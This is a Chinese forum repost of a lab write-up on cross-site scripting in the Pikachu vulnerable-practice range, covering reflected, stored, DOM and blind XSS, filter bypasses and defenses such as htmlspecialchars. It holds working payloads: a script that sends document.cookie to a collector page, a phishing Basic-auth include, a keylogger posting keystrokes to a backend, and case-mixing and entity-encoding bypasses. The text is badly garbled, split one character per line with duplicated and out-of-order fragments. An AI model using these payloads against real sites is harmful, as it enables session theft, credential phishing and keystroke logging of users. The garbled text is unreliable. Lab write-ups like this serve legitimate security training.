论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[15012] 2020-02-14_Pikachu漏洞靶场系列之XSS
文档创建者:
s7ckTeam
浏览次数:
13
最后更新:
2025-01-18
漏洞
13 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-02-14_Pikachu漏洞靶场系列之XSS
P
i
k
a
c
h
u
漏
洞
靶
场
系
列
之
X
S
S
F
e
n
g
S
e
c
F
r
e
e
B
u
f
2
0
2
0
-
0
2
-
1
4
概
述
概
述
跨
站
脚
本
攻
击
跨
站
脚
本
攻
击
(
C
r
o
s
s
-
S
i
t
e
S
c
r
i
p
t
i
n
g
)
简
称
为
简
称
为
“
C
S
S
”
,
为
避
免
与
前
端
叠
成
样
式
表
的
缩
写
,
为
避
免
与
前
端
叠
成
样
式
表
的
缩
写
”
C
S
S
”
冲
突
,
故
又
称
冲
突
,
故
又
称
X
S
S
。
一
般
。
一
般
X
S
S
可
以
分
为
如
下
几
种
常
见
类
型
:
可
以
分
为
如
下
几
种
常
见
类
型
:
1
、
反
射
性
X
S
S
;
2
、
存
储
型
X
S
S
;
3
、
D
O
M
型
X
S
S
;
X
S
S
漏
洞
一
直
被
评
估
为
w
e
b
漏
洞
中
危
害
较
大
的
漏
洞
,
在
O
W
A
S
P
T
O
P
1
0
的
排
名
中
一
直
属
于
前
三
的
江
湖
地
位
。
X
S
S
是
一
种
发
生
在
前
端
浏
览
器
端
的
漏
洞
,
所
以
其
危
害
的
对
象
也
是
前
端
用
户
。
形
成
X
S
S
漏
洞
的
主
要
原
因
是
程
序
对
输
入
和
输
出
没
有
做
合
适
的
处
理
,
导
致
“
精
心
构
造
”
的
字
符
输
出
在
前
端
时
被
浏
览
器
当
作
有
效
代
码
解
析
执
行
从
而
产
生
危
害
。
因
此
在
X
S
S
漏
洞
的
防
范
上
,
一
般
会
采
用
“
对
输
入
进
行
过
滤
”
和
“
对
输
出
进
行
转
义
”
的
方
式
进
行
处
理
输
入
过
滤
输
入
过
滤
:
对
输
入
进
行
过
滤
,
不
允
许
可
能
导
致
X
S
S
攻
击
的
字
符
输
入
;
输
出
转
义
输
出
转
义
:
根
据
输
出
点
的
位
置
对
输
出
到
前
端
的
内
容
进
行
适
当
转
义
;
反
射
型
反
射
型
X
S
S
(
G
e
t
)
输
入
时
发
现
限
制
了
输
入
字
符
长
度
,
F
1
2
审
查
源
码
,
修
改
m
a
x
l
e
n
g
t
h
即
可
构
造
P
a
y
l
o
a
d
反
射
型
反
射
型
X
S
S
(
P
o
s
t
)
这
里
直
接
通
过
a
d
m
i
n
/
1
2
3
4
5
6
登
陆
,
当
前
也
可
以
使
用
B
u
r
p
爆
破
一
下
文
本
框
直
接
输
入
1
2
3
,
看
看
拼
接
格
式
尝
试
闭
合
,
构
造
P
a
y
l
o
a
d
实
验
案
例
实
验
案
例
-
获
取
获
取
C
o
o
k
i
e
相
比
于
G
E
T
方
式
,
黑
客
通
过
P
O
S
T
方
式
窃
取
C
o
o
k
i
e
更
加
神
不
知
鬼
不
觉
,
这
里
来
复
现
一
下
首
先
需
要
搭
建
一
个
收
集
C
o
o
k
i
e
的
后
台
。
这
里
P
i
k
a
c
h
u
已
经
为
我
们
准
备
好
了
,
只
需
要
在
左
侧
管
理
工
具
栏
进
入
X
S
S
后
台
,
点
击
初
始
化
修
改
I
P
地
址
。
打
开
P
i
k
a
c
h
u
/
p
k
x
s
s
/
x
c
o
o
k
i
e
/
p
o
s
t
.
h
t
m
l
文
件
,
因
为
这
里
是
在
本
地
演
示
,
因
此
2
个
I
P
都
修
改
为
1
2
7
.
0
.
0
.
1
,
通
过
目
录
来
区
分
漏
洞
网
站
和
黑
客
后
台
。
如
果
是
在
多
台
虚
拟
机
中
进
行
实
验
,
即
将
第
1
处
修
改
为
漏
洞
网
站
I
P
,
第
2
个
处
修
改
为
黑
客
后
台
I
P
即
可
此
时
,
另
外
打
开
一
个
浏
览
器
来
模
拟
用
户
。
先
访
问
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
p
o
s
t
/
p
o
s
t
_
l
o
g
i
n
.
p
h
p
)
,
并
使
用
另
一
个
账
号
t
e
s
t
/
a
b
c
1
2
3
登
陆
在
用
户
浏
览
器
中
访
问
黑
客
伪
造
的
p
o
s
t
.
h
t
m
l
站
点
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
x
c
o
o
k
i
e
/
p
o
s
t
.
h
t
m
l
)
此
时
,
黑
客
可
以
在
X
S
S
后
台
看
到
窃
取
到
的
C
o
o
k
i
e
。
黑
客
浏
览
器
访
问
后
台
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
x
c
o
o
k
i
e
/
p
k
x
s
s
_
c
o
o
k
i
e
_
r
e
s
u
l
t
.
p
h
p
)
存
储
型
存
储
型
X
S
S
P
a
y
l
o
a
d
实
验
案
例
实
验
案
例
-
钓
鱼
攻
击
钓
鱼
攻
击
黑
客
可
以
在
有
存
储
型
X
S
S
漏
洞
的
网
站
中
嵌
入
一
个
恶
意
J
S
,
当
用
户
访
问
该
站
点
时
自
动
触
发
,
而
在
黑
客
后
台
向
用
户
返
回
一
个
要
求
B
a
s
i
c
认
证
的
头
部
,
那
么
此
时
用
户
界
面
就
会
弹
出
一
个
身
份
认
证
的
提
示
框
。
如
果
用
户
防
范
意
识
不
高
,
在
提
示
框
中
输
入
了
网
站
的
账
号
密
码
,
那
么
该
账
号
密
码
就
会
被
发
送
到
黑
客
后
台
。
P
i
k
a
c
h
u
靶
场
同
样
准
备
好
了
钓
鱼
的
文
件
,
只
需
要
修
改
I
P
地
址
即
可
。
打
开
P
i
k
a
c
h
u
/
p
k
x
s
s
/
x
f
i
s
h
/
f
i
s
h
.
p
h
p
文
件
,
将
I
P
地
址
修
改
为
黑
客
后
台
地
址
,
注
意
I
P
地
址
后
面
需
要
添
加
上
/
p
i
k
a
c
h
u
/
目
录
,
还
有
需
要
注
意
的
是
h
e
a
d
e
r
(
L
o
c
a
t
i
o
n
:
…
)
此
句
,
将
换
行
删
除
,
否
则
无
法
跳
转
。
然
后
在
黑
客
浏
览
器
中
访
问
存
储
型
X
S
S
页
面
,
插
入
恶
意
代
码
<
/
p
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
<
p
c
l
a
s
s
=
"
n
o
t
i
c
e
"
>
w
h
o
i
s
1
2
3
,
i
d
o
n
'
t
c
a
r
e
!
<
/
p
>
<
/
p
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
<
h
t
m
l
>
<
h
e
a
d
>
<
s
c
r
i
p
t
>
w
i
n
d
o
w
.
o
n
l
o
a
d
=
f
u
n
c
t
i
o
n
(
)
{
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
p
o
s
t
s
u
b
m
i
t
"
)
.
c
l
i
c
k
(
)
;
}
<
/
s
c
r
i
p
t
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
f
o
r
m
m
e
t
h
o
d
=
"
p
o
s
t
"
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
p
o
s
t
/
x
s
s
_
r
e
f
l
e
c
t
e
d
_
p
o
s
t
.
p
h
p
"
<
/
p
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
<
?
p
h
p
e
r
r
o
r
_
r
e
p
o
r
t
i
n
g
(
0
)
;
/
/
v
a
r
_
d
u
m
p
(
$
_
S
E
R
V
E
R
)
;
i
f
(
(
!
i
s
s
e
t
(
$
_
S
E
R
V
E
R
[
'
P
H
P
_
A
U
T
H
_
U
S
E
R
'
]
)
)
|
|
(
!
i
s
s
e
t
(
$
_
S
E
R
V
E
R
[
'
P
H
P
_
A
U
T
H
_
P
W
'
]
)
)
)
{
/
/
发
送
认
证
框
,
并
给
出
迷
惑
性
的
i
n
f
o
h
e
a
d
e
r
(
'
C
o
n
t
e
n
t
-
t
y
p
e
:
t
e
x
t
/
h
t
m
l
;
c
h
a
r
s
e
t
=
u
t
f
-
8
'
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
x
f
i
s
h
/
f
i
s
h
.
p
h
p
"
>
<
/
s
c
r
i
p
t
>
打
开
另
一
个
页
面
模
拟
普
通
用
户
,
访
问
存
储
型
X
S
S
页
面
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
_
s
t
o
r
e
d
.
p
h
p
)
。
此
时
页
面
会
弹
出
一
个
B
a
s
i
c
认
证
提
示
框
,
模
拟
用
户
输
入
账
号
密
码
,
点
击
确
定
这
一
步
有
个
坑
就
是
B
a
s
i
c
认
证
后
不
跳
转
,
而
是
一
直
在
弹
认
证
提
示
框
。
尝
试
过
修
改
修
改
P
H
P
版
本
、
修
改
p
k
x
s
s
路
径
、
使
用
2
台
虚
拟
机
分
别
搭
建
漏
洞
网
站
和
黑
客
后
台
环
境
等
等
方
法
都
不
行
,
无
奈
最
终
使
用
作
弊
的
方
法
写
入
:
将
下
面
语
句
插
入
存
储
型
X
S
S
处
,
然
后
使
用
用
户
浏
览
器
访
问
上
面
这
个
坑
后
来
找
到
了
原
因
:
P
H
P
的
的
H
T
T
P
认
证
机
制
仅
在
认
证
机
制
仅
在
P
H
P
以
以
A
p
a
c
h
e
模
块
方
式
运
行
时
才
有
效
,
因
此
该
功
能
不
适
用
于
模
块
方
式
运
行
时
才
有
效
,
因
此
该
功
能
不
适
用
于
C
G
I
版
本
版
本
,
我
这
里
使
用
的
是
p
h
p
S
t
u
d
y
搭
建
的
环
境
,
默
认
是
以
C
G
I
版
本
运
行
P
H
P
。
后
续
通
过
重
新
搭
建
环
境
解
决
此
问
题
。
此
时
,
黑
客
可
以
在
X
S
S
后
台
的
钓
鱼
记
录
处
看
到
用
户
输
入
的
账
号
密
码
实
验
案
例
实
验
案
例
-
键
盘
记
录
键
盘
记
录
打
开
p
i
k
a
c
h
u
/
p
k
x
s
s
/
r
k
e
y
p
r
e
s
s
/
r
k
.
j
s
文
件
,
将
第
5
4
行
语
句
并
修
改
为
黑
客
后
台
地
址
:
浏
览
器
进
入
存
储
型
X
S
S
漏
洞
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
_
s
t
o
r
e
d
.
p
h
p
)
,
插
入
恶
意
代
码
r
k
.
j
s
另
开
一
个
浏
览
器
模
拟
普
通
用
户
进
入
该
漏
洞
页
面
,
任
意
输
入
一
些
字
符
,
无
需
点
击
提
交
此
时
,
黑
客
可
以
在
后
台
看
到
用
户
所
输
入
的
字
符
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
x
f
i
s
h
/
x
f
i
s
h
.
p
h
p
?
u
s
e
r
n
a
m
e
=
n
a
r
a
k
u
&
p
a
s
s
w
o
r
d
=
1
2
3
4
"
>
<
/
s
c
r
i
p
t
>
a
j
a
x
.
o
p
e
n
(
"
P
O
S
T
"
,
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
5
/
p
k
x
s
s
/
r
k
e
y
p
r
e
s
s
/
r
k
s
e
r
v
e
r
.
p
h
p
"
,
t
r
u
e
)
;
#
修
改
为
后
台
地
址
,
如
a
j
a
x
.
o
p
e
n
(
"
P
O
S
T
"
,
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
r
k
e
y
p
r
e
s
s
/
r
k
s
e
r
v
e
r
.
p
h
p
"
,
t
r
u
e
)
;
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
r
k
e
y
p
r
e
s
s
/
r
k
.
j
s
"
>
<
/
s
c
r
i
p
t
>
如
果
是
在
两
台
虚
拟
机
中
搭
建
靶
场
和
黑
客
后
台
,
则
需
要
在
r
k
.
j
s
中
设
置
允
许
跨
域
,
否
则
会
被
同
源
策
略
所
限
制
D
O
M
型
型
X
S
S
随
便
输
入
字
符
串
1
1
1
后
点
击
按
钮
,
可
以
看
到
页
面
显
示
一
条
超
链
接
,
审
查
源
码
,
还
可
以
看
到
一
段
J
S
代
码
由
这
段
J
S
可
知
,
用
户
输
入
的
字
符
串
会
被
存
进
s
t
r
然
后
拼
接
,
构
造
P
a
y
l
o
a
d
:
#
’
o
n
c
l
i
c
k
=
a
l
e
r
t
(
1
)
D
O
M
型
型
X
S
S
-
x
同
上
,
输
入
1
1
1
后
点
击
按
钮
,
发
现
U
R
L
发
生
变
化
点
击
超
链
接
,
U
R
L
再
次
变
化
审
查
源
码
这
里
的
用
户
输
入
同
样
被
拼
接
到
a
标
签
中
,
于
是
构
造
P
a
y
l
o
a
d
:
#
’
o
n
c
l
i
c
k
=
a
l
e
r
t
(
1
)
X
S
S
之
盲
打
之
盲
打
先
任
意
输
入
看
看
拼
接
,
e
m
m
m
…
…
.
/
/
设
置
允
许
被
跨
域
访
问
h
e
a
d
e
r
(
"
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
*
"
)
;
<
d
i
v
i
d
=
"
d
o
m
"
>
<
a
h
r
e
f
=
"
1
1
1
"
>
w
h
a
t
d
o
y
o
u
s
e
e
?
<
/
a
>
<
/
d
i
v
>
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
d
o
m
x
s
s
(
)
{
v
a
r
s
t
r
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
t
e
x
t
"
)
.
v
a
l
u
e
;
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
d
o
m
"
)
.
i
n
n
e
r
H
T
M
L
=
"
<
a
h
r
e
f
=
'
"
+
s
t
r
+
"
'
>
w
h
a
t
d
o
y
o
u
s
e
e
?
<
/
a
>
"
;
}
<
/
s
c
r
i
p
t
>
<
a
h
r
e
f
=
'
1
1
1
'
>
w
h
a
t
d
o
y
o
u
s
e
e
?
<
/
a
>
<
a
h
r
e
f
=
'
#
'
o
n
c
l
i
c
k
=
a
l
e
r
t
(
1
)
'
>
w
h
a
t
d
o
y
o
u
s
e
e
?
<
/
a
>
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
6
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
_
d
o
m
_
x
.
p
h
p
?
t
e
x
t
=
1
1
1
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
6
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
_
d
o
m
_
x
.
p
h
p
?
t
e
x
t
=
1
1
1
#
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
d
o
m
x
s
s
(
)
{
v
a
r
s
t
r
=
w
i
n
d
o
w
.
l
o
c
a
t
i
o
n
.
s
e
a
r
c
h
;
v
a
r
t
x
s
s
=
d
e
c
o
d
e
U
R
I
C
o
m
p
o
n
e
n
t
(
s
t
r
.
s
p
l
i
t
(
"
t
e
x
t
=
"
)
[
1
]
)
;
v
a
r
x
s
s
=
t
x
s
s
.
r
e
p
l
a
c
e
(
/
+
/
g
,
'
'
)
;
/
/
a
l
e
r
t
(
x
s
s
)
;
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
d
o
m
"
)
.
i
n
n
e
r
H
T
M
L
=
"
<
a
h
r
e
f
=
'
"
+
x
s
s
+
"
'
>
就
让
往
事
都
随
风
,
都
随
风
吧
<
/
a
>
"
;
}
<
/
s
c
r
i
p
t
>
<
d
i
v
i
d
=
"
d
o
m
"
>
<
a
h
r
e
f
=
"
1
1
1
"
>
就
让
往
事
都
随
风
,
都
随
风
吧
<
/
a
>
<
/
d
i
v
>
<
a
h
r
e
f
=
'
#
'
o
n
c
l
i
c
k
=
a
l
e
r
t
(
1
)
'
>
就
让
往
事
都
随
风
,
都
随
风
吧
<
/
a
>
这
里
既
然
说
了
盲
打
,
也
就
是
说
只
有
后
台
才
能
看
到
输
入
的
内
容
,
从
前
端
是
无
法
判
断
是
否
存
在
X
S
S
的
。
这
里
可
以
直
接
插
入
前
面
获
取
C
o
o
k
i
e
的
恶
意
代
码
,
直
接
盲
打
后
台
管
理
员
的
C
o
o
k
i
e
此
时
在
页
面
中
插
入
恶
意
代
码
,
现
在
模
拟
管
理
员
登
陆
一
下
后
台
,
后
台
地
址
为
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
v
u
l
/
x
s
s
/
x
s
s
b
l
i
n
d
/
a
d
m
i
n
_
l
o
g
i
n
.
p
h
p
)
,
可
以
点
击
右
侧
提
示
看
到
。
使
用
a
d
m
i
n
/
1
2
3
4
5
6
登
陆
后
,
可
以
看
到
刚
才
插
入
的
语
句
内
容
为
空
白
。
但
管
理
员
的
C
o
o
k
i
e
已
经
在
不
知
不
觉
中
被
黑
客
获
取
可
进
入
黑
客
后
台
查
看
X
S
S
之
过
滤
之
过
滤
任
意
输
入
字
符
进
行
尝
试
,
发
现
标
签
<
s
c
r
i
p
t
>
被
过
滤
使
用
大
小
写
混
合
即
轻
松
绕
过
X
S
S
之
之
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
)
是
P
H
P
提
供
的
一
个
对
特
殊
字
符
进
行
转
义
的
函
数
,
它
可
以
把
预
定
义
的
字
符
转
换
为
H
T
M
L
实
体
&
转
换
为
&
a
m
p
“
转
换
为
&
q
u
o
t
‘
转
换
为
&
#
0
3
9
<
转
换
为
&
l
t
转
换
为
&
g
t
在
本
题
中
,
尝
试
输
入
字
符
1
1
1
’
”
<
>
,
F
1
2
审
查
源
码
,
可
以
看
到
输
入
的
字
符
被
转
换
成
如
下
代
码
,
可
以
判
断
这
里
调
用
了
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
)
函
数
,
并
且
可
以
看
到
单
引
号
’
没
有
被
转
换
,
因
此
这
里
第
2
个
参
数
使
用
的
是
默
认
模
式
E
N
T
_
C
O
M
P
A
T
,
所
以
这
里
可
以
尝
试
使
用
单
引
号
进
行
绕
过
先
使
用
单
引
号
闭
合
a
标
签
,
然
后
再
进
行
弹
框
。
提
交
后
需
要
点
击
超
链
接
才
会
弹
框
<
s
c
r
i
p
t
>
d
o
c
u
m
e
n
t
.
l
o
c
a
t
i
o
n
=
'
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
p
i
k
a
c
h
u
/
p
k
x
s
s
/
x
c
o
o
k
i
e
/
c
o
o
k
i
e
.
p
h
p
?
c
o
o
k
i
e
=
'
+
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
;
<
/
s
c
r
i
p
t
>
<
S
c
R
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
C
r
i
P
t
>
$
v
a
l
u
e
=
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
$
_
G
E
T
[
'
v
a
l
u
e
'
]
,
E
N
T
_
C
O
M
P
A
T
)
;
#
第
2
个
参
数
规
定
了
如
何
处
理
引
号
E
N
T
_
C
O
M
P
A
T
#
默
认
,
仅
对
双
引
号
进
行
编
码
E
N
T
_
Q
U
O
T
E
S
#
推
荐
,
编
码
单
双
引
号
E
N
T
_
N
O
Q
U
O
T
E
S
#
不
编
码
任
何
引
号
<
a
h
r
e
f
=
"
1
1
1
"
&
q
u
o
t
;
&
l
t
;
&
g
t
;
'
=
"
"
>
1
1
1
'
"
&
l
t
;
&
g
t
;
<
/
a
>
X
S
S
之
之
h
r
e
f
输
出
输
出
i
>
输
出
在
a
标
签
的
h
r
e
f
属
性
中
,
可
以
使
用
j
a
v
a
s
c
r
i
p
t
协
议
来
执
行
J
S
P
a
y
l
o
a
d
防
御
:
只
允
许
h
t
t
p
(
s
)
,
其
次
再
进
行
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
处
理
X
S
S
之
之
J
S
输
出
输
出
i
>
输
出
被
拼
接
到
J
S
中
,
可
以
直
接
修
改
J
S
源
码
实
现
逃
过
随
便
输
入
一
个
x
x
x
,
F
1
2
审
查
源
码
,
可
以
看
到
,
用
户
输
入
的
字
符
被
拼
接
到
$
m
s
变
量
中
:
构
造
P
a
y
l
o
a
d
:
x
x
x
’
;
a
l
e
r
t
(
1
)
;
/
/
,
先
把
单
引
号
闭
合
并
弹
框
,
然
后
将
后
面
的
单
引
号
注
释
掉
当
然
也
可
以
直
接
闭
合
掉
<
/
s
c
r
i
p
t
>
标
签
,
构
造
P
a
y
l
o
a
d
:
x
x
x
’
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
/
/
总
结
总
结
漏
洞
利
用
漏
洞
利
用
G
E
T
方
式
:
可
以
通
过
直
接
构
造
U
R
L
来
诱
导
用
户
点
击
,
一
般
需
要
会
转
换
成
短
连
接
P
O
S
T
方
式
:
黑
客
通
过
伪
造
一
个
表
单
自
动
提
交
的
页
面
,
当
用
户
访
问
页
面
时
触
发
表
单
,
页
面
J
S
自
动
P
O
S
T
表
单
数
据
到
存
在
P
O
S
T
型
X
S
S
漏
洞
的
网
站
,
并
将
C
o
o
k
i
e
返
回
到
黑
客
后
台
,
黑
客
通
过
C
o
o
k
i
e
伪
装
成
用
户
登
录
并
造
成
危
害
。
跨
域
与
同
源
策
略
跨
域
与
同
源
策
略
同
源
策
略
:
限
制
了
来
自
不
同
源
的
限
制
了
来
自
不
同
源
的
d
o
c
u
m
e
n
t
或
脚
本
,
对
当
前
或
脚
本
,
对
当
前
d
o
c
u
m
e
n
t
读
取
或
设
置
某
些
属
性
读
取
或
设
置
某
些
属
性
。
影
响
源
源
的
因
素
有
:
协
议
、
子
域
名
、
主
机
(
域
名
/
I
P
)
、
端
口
。
任
一
因
素
不
相
同
时
,
也
称
为
不
同
域
。
同
源
策
略
规
定
,
不
同
域
直
接
不
能
使
用
J
S
相
互
操
作
。
即
x
.
c
o
m
中
的
J
S
不
能
操
作
y
.
c
o
m
下
的
对
象
。
如
果
想
要
跨
域
操
作
,
需
要
管
理
员
自
行
配
置
而
下
面
的
几
个
标
签
不
受
同
源
策
略
限
制
,
可
以
跨
域
加
载
资
源
。
但
是
浏
览
器
限
制
了
J
a
v
a
S
c
r
i
p
t
的
权
限
,
使
其
不
能
读
写
返
回
的
内
容
。
绕
过
绕
过
转
换
转
换
前
端
限
制
:
直
接
抓
包
重
放
,
或
者
修
改
前
端
代
码
大
小
写
拼
凑
注
释
x
'
o
n
c
l
i
c
k
=
'
a
l
e
r
t
(
1
)
'
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
<
s
c
r
i
p
t
>
$
m
s
=
'
x
x
x
'
;
i
f
(
$
m
s
.
l
e
n
g
t
h
!
=
0
)
{
i
f
(
$
m
s
=
=
'
t
m
a
c
'
)
{
$
(
'
#
f
r
o
m
j
s
'
)
.
t
e
x
t
(
'
t
m
a
c
确
实
厉
害
,
看
那
小
眼
神
.
.
'
)
}
e
l
s
e
{
/
/
a
l
e
r
t
(
$
m
s
)
;
$
(
'
#
f
r
o
m
j
s
'
)
.
t
e
x
t
(
'
无
论
如
何
不
要
放
弃
心
中
所
爱
.
.
'
)
}
}
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
$
m
s
=
'
x
x
x
'
;
a
l
e
r
t
(
1
)
;
/
/
'
;
.
.
.
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
$
m
s
=
'
x
x
x
'
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
/
/
'
;
.
.
.
<
/
s
c
r
i
p
t
>
h
t
t
p
:
/
/
w
w
w
.
b
a
i
d
u
.
c
o
m
:
8
0
/
h
a
c
k
e
r
.
j
s
协
议
子
域
名
主
机
端
口
资
源
地
址
h
e
a
d
e
r
(
"
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
x
.
c
o
m
"
)
;
<
i
m
g
s
r
c
=
"
"
>
/
/
图
片
<
s
c
r
i
p
t
s
r
c
=
"
"
>
/
/
J
S
<
l
i
n
k
h
r
e
f
=
"
"
>
/
/
C
S
S
<
i
f
r
a
m
e
s
r
c
=
"
"
>
/
/
任
意
资
源
<
S
C
r
i
p
T
>
a
l
E
R
t
(
1
)
<
/
s
c
R
i
P
t
>
<
s
c
r
i
<
s
c
r
i
p
t
>
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
<
/
s
c
r
i
p
t
>
i
p
t
>
编
码
编
码
使
用
编
码
的
时
候
需
要
注
意
编
码
在
输
出
点
上
是
否
会
被
正
确
识
别
并
翻
译
x
>
错
误
示
例
将
a
l
e
r
t
(
‘
x
s
s
’
)
进
行
U
R
L
编
码
。
不
能
执
行
,
因
为
这
些
属
性
标
签
不
会
正
常
解
析
这
些
编
码
√
>
正
确
示
例
将
a
l
e
r
t
(
‘
x
s
s
’
)
进
行
字
符
实
体
/
H
T
M
L
编
码
,
可
以
执
行
*
本
文
作
者
:
本
文
作
者
:
F
e
n
g
S
e
c
,
转
载
请
注
明
来
自
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
精
彩
推
荐
精
彩
推
荐
<
s
c
r
<
!
-
-
t
e
s
t
-
-
>
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
<
!
-
-
t
e
s
t
-
-
>
r
i
p
t
>
<
i
m
g
s
r
c
=
x
o
n
e
r
r
o
r
=
"
a
l
e
r
t
(
'
x
s
s
'
)
"
/
>
<
i
m
g
s
r
c
=
x
o
n
e
r
r
o
r
=
"
a
l
e
r
t
%
2
8
%
2
7
x
s
s
%
2
7
%
2
9
"
/
>
<
i
m
g
s
r
c
=
x
o
n
e
r
r
o
r
=
"
a
l
e
r
t
(
'
x
s
s
'
)
"
/
>
<
i
m
g
s
r
c
=
x
o
n
e
r
r
o
r
=
"
&
#
9
7
;
&
#
1
0
8
;
&
#
1
0
1
;
&
#
1
1
4
;
&
#
1
1
6
;
&
#
4
0
;
&
#
3
9
;
&
#
1
2
0
;
&
#
1
1
5
;
&
#
1
1
5
;
&
#
3
9
;
&
#
4
1
;
"
/
>
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞